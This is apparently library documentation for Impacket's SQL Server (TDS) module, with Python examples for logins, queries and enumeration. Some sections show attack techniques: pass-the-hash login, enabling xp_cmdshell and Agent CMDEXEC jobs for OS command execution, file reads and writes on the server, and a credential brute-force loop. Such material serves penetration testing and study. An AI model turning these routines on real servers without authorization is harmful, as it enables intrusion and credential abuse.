MSSQL Protocol
Impacket’s TDS (Tabular Data Stream) implementation provides comprehensive support for connecting to and interacting with Microsoft SQL Server, including authentication, query execution, and advanced features.
Overview
The TDS protocol implementation is located in impacket/tds.py and includes:
- Authentication - Windows authentication (NTLM/Kerberos), SQL authentication
- Query execution - Execute SQL queries and stored procedures
- Multiple result sets - Handle complex query results
- Encryption - TLS encryption for secure connections
TDS Protocol
TDS (Tabular Data Stream) is Microsoft’s application-level protocol for SQL Server communication. Impacket implements TDS 7.0+ for compatibility with modern SQL Server versions.
Connection and Authentication
Basic Connection
From tds.py:1-100:
from impacket.tds import MSSQL
# Open the TCP connection to the server; authentication is a separate login() call
ms_sql = MSSQL(address='192.168.1.10', port=1433)
ms_sql.connect()
print("[+] Connected to SQL Server")
SQL Authentication
from impacket.tds import MSSQL
# SQL Server authentication
ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()
# Login with SQL credentials. login() reports the outcome through its return
# value, so check it instead of assuming success.
authenticated = ms_sql.login(
    database='master',
    username='sa',
    password='P@ssw0rd',
    domain='',
    hashes=None,  # None selects password auth; '' cannot be split into LM:NT
)
if authenticated:
    print("[+] Authenticated as sa")
else:
    # Show the server's error message for the rejected login
    ms_sql.printReplies()
    print("[-] Login failed for sa")
Windows Authentication (NTLM)
from impacket.tds import MSSQL
# Windows authentication
ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()
# Login with domain credentials. useWindowsAuth=True is what switches login()
# from SQL authentication to NTLM; without it the domain is not used.
if ms_sql.login(
    database='master',
    username='jdoe',
    password='P@ssw0rd',
    domain='CORP',
    hashes=None,
    useWindowsAuth=True,
):
    print("[+] Authenticated as CORP\\jdoe")
ms_sql.disconnect()

# Or with NTLM hash (Pass-the-Hash). A fresh connection is used because the
# previous one has already completed its login exchange.
ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()
ms_sql.login(
    database='master',
    username='jdoe',
    password='',
    domain='CORP',
    hashes='aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0',
    useWindowsAuth=True,
)
Kerberos Authentication
from impacket.tds import MSSQL
# Kerberos authentication
# NOTE(review): remoteName is supplied because kerberosLogin() appears to build
# the MSSQLSvc SPN from it — confirm against the installed impacket version.
ms_sql = MSSQL('sql01.corp.local', port=1433, remoteName='sql01.corp.local')
ms_sql.connect()
if ms_sql.kerberosLogin(
    database='master',
    username='jdoe',
    password='P@ssw0rd',
    domain='CORP.LOCAL',
    kdcHost='dc01.corp.local',
):
    print("[+] Authenticated via Kerberos")
ms_sql.disconnect()

# With AES key, on a fresh connection (the previous one already logged in)
ms_sql = MSSQL('sql01.corp.local', port=1433, remoteName='sql01.corp.local')
ms_sql.connect()
ms_sql.kerberosLogin(
    database='master',
    username='jdoe',
    password='',
    domain='CORP.LOCAL',
    aesKey='e5c4d39c...',
    kdcHost='dc01.corp.local',
)
Query Execution
Execute Query
from impacket.tds import MSSQL
ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()
ms_sql.login('master', 'sa', 'P@ssw0rd')
# Execute SELECT query; the rows are the return value of sql_query()
result = ms_sql.sql_query("SELECT @@VERSION")
# printReplies() only reports server messages and errors, it returns no rows
ms_sql.printReplies()
# Get results
print(result)
# Disconnect
ms_sql.disconnect()
Multiple Queries
# Execute multiple statements in one batch
query = """
SELECT name, database_id FROM sys.databases;
SELECT name FROM sys.tables WHERE type = 'U';
"""
# Keep the return value: that is where the result rows are delivered
rows = ms_sql.sql_query(query)
# Report any server messages or errors raised by the batch
ms_sql.printReplies()
print(rows)
Parameterized Queries
# Safe parameterized query
# sql_query() sends the batch text verbatim, so a bare "?" placeholder is never
# bound. Bind the value through sp_executesql inside the batch instead.
username = "alice"
# Double single quotes so the value stays inside its N'...' literal
username_literal = "N'" + username.replace("'", "''") + "'"
query = (
    "EXEC sp_executesql "
    "N'SELECT * FROM users WHERE username = @username', "
    "N'@username nvarchar(128)', "
    f"@username = {username_literal}"
)
rows = ms_sql.sql_query(query)
ms_sql.printReplies()
# Note: Impacket's TDS implementation handles basic queries
# For complex parameterized queries, use RPC calls
Information Gathering
Enumerate Databases
def enum_databases(ms_sql):
    """List all databases on the server.

    Args:
        ms_sql: Connected, authenticated client exposing ``sql_query`` and
            ``printReplies``.

    Returns:
        The rows returned by ``ms_sql.sql_query`` for the statement.
    """
    query = """
SELECT
name,
database_id,
create_date,
state_desc
FROM sys.databases
ORDER BY name
"""
    rows = ms_sql.sql_query(query)
    # printReplies() only reports messages/errors; the rows come from sql_query()
    ms_sql.printReplies()
    return rows
# Usage: connect, authenticate, then dump the database list
ms_sql = MSSQL('192.168.1.10')
ms_sql.connect()
ms_sql.login('master', 'sa', 'P@ssw0rd')
print("[*] Databases:")
result = enum_databases(ms_sql)
print(result)
Enumerate Tables
def enum_tables(ms_sql, database='master'):
    """List all base tables in a database.

    Args:
        ms_sql: Connected, authenticated client exposing ``sql_query`` and
            ``printReplies``.
        database: Name of the database to switch to before querying.

    Returns:
        The rows returned by ``ms_sql.sql_query`` for the batch.
    """
    # Double any closing bracket so the name cannot break out of [...]
    safe_db = database.replace(']', ']]')
    query = f"""
USE [{safe_db}];
SELECT
TABLE_SCHEMA,
TABLE_NAME,
TABLE_TYPE
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE'
ORDER BY TABLE_NAME
"""
    rows = ms_sql.sql_query(query)
    # printReplies() only reports messages/errors; the rows come from sql_query()
    ms_sql.printReplies()
    return rows
# Usage: list the tables of the 'master' database on the open connection
print("[*] Tables in 'master':")
result = enum_tables(ms_sql, database='master')
print(result)
Enumerate Users and Logins
def enum_logins(ms_sql):
    """Enumerate server-level logins from ``sys.server_principals``.

    Args:
        ms_sql: Connected, authenticated client exposing ``sql_query`` and
            ``printReplies``.

    Returns:
        The rows returned by ``ms_sql.sql_query`` for the statement.
    """
    query = """
SELECT
name,
type_desc,
is_disabled,
create_date,
modify_date
FROM sys.server_principals
WHERE type IN ('S', 'U', 'G')
ORDER BY name
"""
    rows = ms_sql.sql_query(query)
    # printReplies() only reports messages/errors; the rows come from sql_query()
    ms_sql.printReplies()
    return rows
def enum_database_users(ms_sql, database='master'):
    """Enumerate the principals of one database.

    Args:
        ms_sql: Connected, authenticated client exposing ``sql_query`` and
            ``printReplies``.
        database: Name of the database to switch to before querying.

    Returns:
        The rows returned by ``ms_sql.sql_query`` for the batch.
    """
    # Double any closing bracket so the name cannot break out of [...]
    safe_db = database.replace(']', ']]')
    query = f"""
USE [{safe_db}];
SELECT
name,
type_desc,
create_date,
modify_date
FROM sys.database_principals
WHERE type IN ('S', 'U', 'G')
ORDER BY name
"""
    rows = ms_sql.sql_query(query)
    # printReplies() only reports messages/errors; the rows come from sql_query()
    ms_sql.printReplies()
    return rows
Check Privileges
def check_privileges(ms_sql):
    """Print the current login and its key role memberships.

    Runs one small query per check and prints ``"<label>: <rows>"`` for each.

    Args:
        ms_sql: Connected, authenticated client exposing ``sql_query`` and
            ``printReplies``.
    """
    queries = {
        'Current User': "SELECT SYSTEM_USER, USER_NAME()",
        'Server Role': "SELECT IS_SRVROLEMEMBER('sysadmin')",
        'Public Role': "SELECT IS_SRVROLEMEMBER('public')",
        'Database Owner': "SELECT IS_MEMBER('db_owner')",
    }
    for name, query in queries.items():
        # The rows are the return value of sql_query(); printReplies() only
        # reports server messages and errors.
        result = ms_sql.sql_query(query)
        ms_sql.printReplies()
        print(f"{name}: {result}")
# Check if sysadmin
rows = ms_sql.sql_query("SELECT IS_SRVROLEMEMBER('sysadmin')")
ms_sql.printReplies()
# Take the single value of the first row. Rows are assumed to be dicts keyed by
# column name (tuples are handled too) — verify against your impacket version.
first_row = rows[0] if rows else None
values = list(first_row.values()) if isinstance(first_row, dict) else list(first_row or ())
if 1 in values:
    print("[+] Current user has sysadmin privileges!")
else:
    print("[-] Not a sysadmin")
Advanced Features
xp_cmdshell Execution
xp_cmdshell allows OS command execution and requires sysadmin privileges. Use responsibly and only on systems you’re authorized to test.
def enable_xp_cmdshell(ms_sql):
    """Enable xp_cmdshell through sp_configure (requires sysadmin).

    Sends the four configuration statements one batch at a time and prints a
    confirmation afterwards. The confirmation is printed unconditionally;
    inspect the output of ``printReplies`` for server-side errors.

    Args:
        ms_sql: Connected, authenticated client exposing ``sql_query`` and
            ``printReplies``.
    """
    queries = [
        "EXEC sp_configure 'show advanced options', 1",
        "RECONFIGURE",
        "EXEC sp_configure 'xp_cmdshell', 1",
        "RECONFIGURE",
    ]
    for query in queries:
        ms_sql.sql_query(query)
        ms_sql.printReplies()
    print("[+] xp_cmdshell enabled")
def exec_xp_cmdshell(ms_sql, command):
    """Execute an OS command via xp_cmdshell and return its output rows.

    Args:
        ms_sql: Connected, authenticated client exposing ``sql_query`` and
            ``printReplies``.
        command: Command line to run on the server.

    Returns:
        The rows returned by ``ms_sql.sql_query`` for the call.
    """
    # Double single quotes so the command stays inside its T-SQL string literal
    escaped = command.replace("'", "''")
    query = f"EXEC xp_cmdshell '{escaped}'"
    rows = ms_sql.sql_query(query)
    # printReplies() only reports messages/errors; the rows come from sql_query()
    ms_sql.printReplies()
    return rows
# Usage: authenticate, switch xp_cmdshell on, then run a single command
ms_sql = MSSQL('192.168.1.10')
ms_sql.connect()
ms_sql.login('master', 'sa', 'P@ssw0rd')
enable_xp_cmdshell(ms_sql)
result = exec_xp_cmdshell(ms_sql, command='whoami')
print(f"Command output: {result}")
File Operations
def read_file(ms_sql, filepath):
    """Read a server-side file using OPENROWSET (requires BULK permissions).

    Args:
        ms_sql: Connected, authenticated client exposing ``sql_query`` and
            ``printReplies``.
        filepath: Path of the file as seen by the SQL Server host.

    Returns:
        The rows returned by ``ms_sql.sql_query`` for the statement.
    """
    # Double single quotes so the path stays inside the BULK string literal
    safe_path = filepath.replace("'", "''")
    query = f"""
SELECT BulkColumn
FROM OPENROWSET(
BULK '{safe_path}',
SINGLE_BLOB
) AS x
"""
    rows = ms_sql.sql_query(query)
    # printReplies() only reports messages/errors; the rows come from sql_query()
    ms_sql.printReplies()
    return rows
def write_file(ms_sql, filepath, content):
    """Write a file on the server by echoing content through xp_cmdshell.

    Args:
        ms_sql: Connected, authenticated client exposing ``sql_query`` and
            ``printReplies``.
        filepath: Destination path on the SQL Server host.
        content: Text passed to ``echo``; shell metacharacters are not
            neutralised here.

    Returns:
        The rows returned by ``ms_sql.sql_query`` for the call.
    """
    command = f"echo {content} > {filepath}"
    # Escape the whole command, not just the content: a quote in the path would
    # otherwise terminate the T-SQL string literal as well.
    command_escaped = command.replace("'", "''")
    query = f"EXEC xp_cmdshell '{command_escaped}'"
    rows = ms_sql.sql_query(query)
    ms_sql.printReplies()
    return rows
# Fetch the Windows hosts file from the server and display it
hosts_path = 'C:\\Windows\\System32\\drivers\\etc\\hosts'
result = read_file(ms_sql, hosts_path)
print(result)
Linked Servers
def enum_linked_servers(ms_sql):
    """Enumerate linked servers with ``sp_linkedservers``.

    Args:
        ms_sql: Connected, authenticated client exposing ``sql_query`` and
            ``printReplies``.

    Returns:
        The rows returned by ``ms_sql.sql_query`` for the call.
    """
    query = "EXEC sp_linkedservers"
    rows = ms_sql.sql_query(query)
    # printReplies() only reports messages/errors; the rows come from sql_query()
    ms_sql.printReplies()
    return rows
def query_linked_server(ms_sql, linked_server, query):
    """Execute a statement on a linked server via ``EXEC(...) AT``.

    Args:
        ms_sql: Connected, authenticated client exposing ``sql_query`` and
            ``printReplies``.
        linked_server: Name of the linked server.
        query: T-SQL text to run remotely.

    Returns:
        The rows returned by ``ms_sql.sql_query`` for the call.
    """
    # The remote statement travels as a string literal: double its quotes
    inner = query.replace("'", "''")
    # Double any closing bracket so the name cannot break out of [...]
    server = linked_server.replace(']', ']]')
    full_query = f"EXEC('{inner}') AT [{server}]"
    rows = ms_sql.sql_query(full_query)
    ms_sql.printReplies()
    return rows
# Usage: show which linked servers are configured
print("[*] Linked servers:")
linked = enum_linked_servers(ms_sql)
print(linked)
# Then run a statement on one of them
result = query_linked_server(ms_sql, 'LINKEDSRV', 'SELECT @@VERSION')
print(result)
SQL Server Agent Jobs
def enum_agent_jobs(ms_sql):
    """Enumerate SQL Server Agent jobs from ``msdb.dbo.sysjobs``.

    Args:
        ms_sql: Connected, authenticated client exposing ``sql_query`` and
            ``printReplies``.

    Returns:
        The rows returned by ``ms_sql.sql_query`` for the statement.
    """
    query = """
SELECT
job_id,
name,
enabled,
date_created,
date_modified
FROM msdb.dbo.sysjobs
ORDER BY name
"""
    rows = ms_sql.sql_query(query)
    # printReplies() only reports messages/errors; the rows come from sql_query()
    ms_sql.printReplies()
    return rows
def create_agent_job(ms_sql, job_name, command):
    """Create and start a SQL Agent job that runs an OS command.

    Sends five batches in order: switch to msdb, add the job, add a CMDEXEC
    step, attach the job to the server, start it.

    Args:
        ms_sql: Connected, authenticated client exposing ``sql_query`` and
            ``printReplies``.
        job_name: Name of the job to create.
        command: Command line for the job step.
    """
    # Both values are embedded in N'...' literals: double their single quotes
    safe_name = job_name.replace("'", "''")
    safe_command = command.replace("'", "''")
    queries = [
        "USE msdb",
        f"EXEC dbo.sp_add_job @job_name = N'{safe_name}'",
        f"""EXEC sp_add_jobstep
@job_name = N'{safe_name}',
@step_name = N'Execute',
@subsystem = N'CMDEXEC',
@command = N'{safe_command}'""",
        f"EXEC sp_add_jobserver @job_name = N'{safe_name}'",
        f"EXEC sp_start_job @job_name = N'{safe_name}'",
    ]
    for query in queries:
        ms_sql.sql_query(query)
        ms_sql.printReplies()
TDS Protocol Details
Packet Types
From tds.py:117-127:
# TDS packet (message) type identifiers, as carried in the packet header
TDS_SQL_BATCH      = 1   # SQL batch (plain query text)
TDS_PRE_TDS_LOGIN  = 2   # Login used before TDS 7
TDS_RPC            = 3   # Remote procedure call request
TDS_TABULAR        = 4   # Tabular result from the server
TDS_ATTENTION      = 6   # Attention signal (cancel)
TDS_BULK_LOAD_DATA = 7   # Bulk load data
TDS_TRANSACTION    = 14  # Transaction manager request
TDS_LOGIN7         = 16  # TDS 7.0+ login
TDS_SSPI           = 17  # SSPI message
TDS_PRE_LOGIN      = 18  # Pre-login message
Encryption
TDS supports TLS encryption for secure communication. Encryption is negotiated during the pre-login phase.
from impacket.tds import MSSQL, TDS_ENCRYPT_ON, TDS_ENCRYPT_REQ
# Encryption level constants are defined in tds.py:136-139.
# NOTE(review): nothing in this snippet forces encryption; it only opens a
# connection and lists the constant values for reference.
ms_sql = MSSQL('192.168.1.10', port=1433)
ms_sql.connect()
# Encryption negotiated automatically during login
# TDS_ENCRYPT_OFF = 0 # No encryption
# TDS_ENCRYPT_ON = 1 # Encryption on
# TDS_ENCRYPT_NOT_SUP = 2 # Not supported
# TDS_ENCRYPT_REQ = 3 # Required
Security Testing
Bruteforce Authentication
def bruteforce_sql_auth(target, usernames, passwords):
    """Try every username/password pair against a SQL Server.

    Args:
        target: Host name or address of the server (port 1433 is used).
        usernames: Iterable of login names to try.
        passwords: Iterable of passwords to try for each login name.

    Returns:
        The first ``(username, password)`` tuple that logs in, or ``None``
        when no combination works.
    """
    for username in usernames:
        for password in passwords:
            ms_sql = MSSQL(target, port=1433)
            connected = False
            try:
                ms_sql.connect()
                connected = True
                # login() returns False for rejected credentials instead of
                # raising, so the return value decides success.
                if ms_sql.login('master', username, password):
                    print(f"[+] SUCCESS: {username}:{password}")
                    return (username, password)
                print(f"[-] Failed: {username}:{password}")
            except Exception as e:
                # Connection or protocol error: report it and keep going
                print(f"[-] Failed: {username}:{password} ({e})")
            finally:
                # Close every attempt's socket, successful or not
                if connected:
                    ms_sql.disconnect()
    return None
# Usage
usernames = ['sa', 'admin', 'sqlserver']
passwords = ['', 'password', 'P@ssw0rd', 'admin']
creds = bruteforce_sql_auth('192.168.1.10', usernames, passwords)
# creds is None when no combination worked
if creds:
    print(f"\n[+] Valid credentials found: {creds[0]}:{creds[1]}")
Enumerate SPNs
def find_mssql_spns(ldap_conn, domain):
    """Find accounts with an MSSQLSvc SPN in Active Directory.

    Args:
        ldap_conn: Bound LDAP connection exposing ``search``.
        domain: Domain name. Not used by the search itself; kept so existing
            callers keep working.

    Returns:
        A list with one dict per matching entry, mapping each returned
        attribute name to a list of its values as strings.
    """
    from impacket.ldap.ldapasn1 import SearchResultEntry
    ldap_filter = '(servicePrincipalName=MSSQLSvc/*)'
    attributes = ['servicePrincipalName', 'sAMAccountName', 'dNSHostName']
    # NOTE(review): search() is expected to return the result entries itself;
    # confirm against the installed impacket version.
    results = ldap_conn.search(
        searchFilter=ldap_filter,
        attributes=attributes,
    )
    mssql_servers = []
    for entry in results or []:
        # Skip anything that is not a result entry
        if not isinstance(entry, SearchResultEntry):
            continue
        server = {
            str(attr['type']): [str(val) for val in attr['vals']]
            for attr in entry['attributes']
        }
        mssql_servers.append(server)
    return mssql_servers
# Find all SQL Servers in domain
for server in find_mssql_spns(ldap_conn, 'CORP.LOCAL'):
    # dNSHostName may be absent on the entry, hence the fallback
    print(f"SQL Server: {server.get('dNSHostName', ['Unknown'])[0]}")
    for spn in server.get('servicePrincipalName', []):
        print(f" - {spn}")
Error Handling
Always handle SQL exceptions properly to avoid crashes and information disclosure.
from impacket.tds import MSSQL, SQLErrorException
# Bind the name first so the finally clause can always test it
ms_sql = None
try:
    ms_sql = MSSQL('192.168.1.10', port=1433)
    ms_sql.connect()
    # A rejected login is reported through the return value, not an exception
    if not ms_sql.login('master', 'sa', 'wrong_password'):
        ms_sql.printReplies()
        print("Login failed")
except SQLErrorException as e:
    print(f"SQL Error: {e}")
except Exception as e:
    print(f"Connection Error: {e}")
finally:
    if ms_sql is not None:
        ms_sql.disconnect()
Complete Example: SQL Server Client
from impacket.tds import MSSQL
import sys
def sql_client(target, username, password, database='master', domain=''):
    """Run a small interactive SQL Server client.

    Connects to ``target`` on port 1433, logs in, prints the server version,
    the current login and the database list, then reads statements from
    standard input until ``exit``/``quit`` or end of input.

    Args:
        target: Host name or address of the server.
        username: Login name.
        password: Password for the login.
        database: Database to select at login.
        domain: Windows domain; when non-empty, Windows authentication is
            requested.

    Returns:
        0 on a normal exit, 1 when the login is rejected or an error occurs.
    """
    ms_sql = MSSQL(target, port=1433)
    try:
        print(f"[*] Connecting to {target}:1433...")
        ms_sql.connect()
        print(f"[*] Authenticating as {username}...")
        logged_in = ms_sql.login(
            database=database,
            username=username,
            password=password,
            domain=domain,
            # A domain account needs Windows auth; plain SQL auth otherwise
            useWindowsAuth=bool(domain),
        )
        # login() signals rejected credentials through its return value
        if not logged_in:
            ms_sql.printReplies()
            print("[-] Authentication failed")
            return 1
        print("[+] Authentication successful\n")
        # Get version (rows are returned by sql_query, not by printReplies)
        version = ms_sql.sql_query("SELECT @@VERSION")
        ms_sql.printReplies()
        print(f"[*] SQL Server Version:\n{version}\n")
        # Check privileges
        privs = ms_sql.sql_query("SELECT SYSTEM_USER, IS_SRVROLEMEMBER('sysadmin')")
        ms_sql.printReplies()
        print(f"[*] Current User: {privs}\n")
        # List databases
        print("[*] Databases:")
        dbs = ms_sql.sql_query("SELECT name FROM sys.databases ORDER BY name")
        ms_sql.printReplies()
        print(dbs)
        # Interactive mode
        print("\n[*] Entering interactive mode (type 'exit' to quit)\n")
        while True:
            try:
                query = input("SQL> ")
            except EOFError:
                # End of input (Ctrl-D / closed pipe) ends the session cleanly
                break
            if query.lower() in ['exit', 'quit']:
                break
            if not query.strip():
                continue
            try:
                result = ms_sql.sql_query(query)
                ms_sql.printReplies()
                print(result)
            except Exception as e:
                # A failing statement must not end the session
                print(f"Error: {e}")
    except Exception as e:
        print(f"[-] Error: {e}")
        return 1
    finally:
        ms_sql.disconnect()
        print("\n[*] Disconnected")
    return 0
# Command-line entry point: <target> <username> <password> [domain]
if __name__ == '__main__':
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target> <username> <password> [domain]")
        sys.exit(1)
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    # The domain is optional; an empty string is used when it is omitted
    domain = sys.argv[4] if len(sys.argv) > 4 else ''
    # Use the client's return value as the process exit status
    sys.exit(sql_client(target, username, password, domain=domain))
Port Discovery
SQL Server Browser (UDP 1434)
From tds.py:70-76:
import socket
from impacket.tds import SQLR_CLNT_UCAST_INST, SQLR_Response
def query_sql_browser(target, instance=''):
    """Query the SQL Server Browser service (UDP 1434) for instance details.

    Args:
        target: Host name or address running the Browser service.
        instance: Instance name to ask about. When empty, all instances on
            the host are requested.

    Returns:
        The decoded ``Data`` field of the Browser response.

    Raises:
        socket.timeout: No answer arrived within five seconds.
    """
    # SQL Browser port
    SQLR_PORT = 1434
    # Create request. SQLR_CLNT_UCAST_INST is the one-byte opcode (an int, not
    # a packet class), so the datagram is assembled by hand.
    if instance:
        request = bytes([SQLR_CLNT_UCAST_INST]) + instance.encode() + b'\x00'
    else:
        # CLNT_UCAST_EX (0x03): single-byte request listing every instance
        request = b'\x03'
    # The context manager closes the socket even if the receive times out
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(5)
        # Send UDP request
        sock.sendto(request, (target, SQLR_PORT))
        # Receive response
        data, _ = sock.recvfrom(4096)
    # Parse response
    response = SQLR_Response(data)
    return response['Data'].decode()
# Ask the Browser service on the target which SQL instances it knows about
instances = query_sql_browser(target='192.168.1.10')
print(f"SQL Instances:\n{instances}")
Related Topics
References
- Source: impacket/tds.py
- [MS-TDS]: Tabular Data Stream Protocol
- [MC-SQLR]: SQL Server Resolution Protocol